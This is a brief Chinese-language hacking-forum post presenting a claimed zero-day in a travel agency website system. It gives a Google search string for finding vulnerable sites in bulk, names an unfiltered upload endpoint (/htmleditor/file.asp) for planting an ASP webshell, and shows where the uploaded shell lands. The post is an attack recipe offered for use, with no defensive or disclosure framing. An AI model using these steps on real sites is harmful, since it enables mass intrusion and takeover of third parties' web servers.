易英冠诚旅行社网站系统0day

作者:hack1990 时间:11-03-27 阅读数:841人阅读

易英冠诚旅行社网站系统上传漏洞。没任何过滤。直接上传webshell

谷歌批量:inurl:way/show.asp?id=

http://www.xxx.com/htmleditor/file.asp 直接上asp木马

上传后shell路径http://www.xxx.com/uploadfiles/20110326-0000000078.asp

发表评论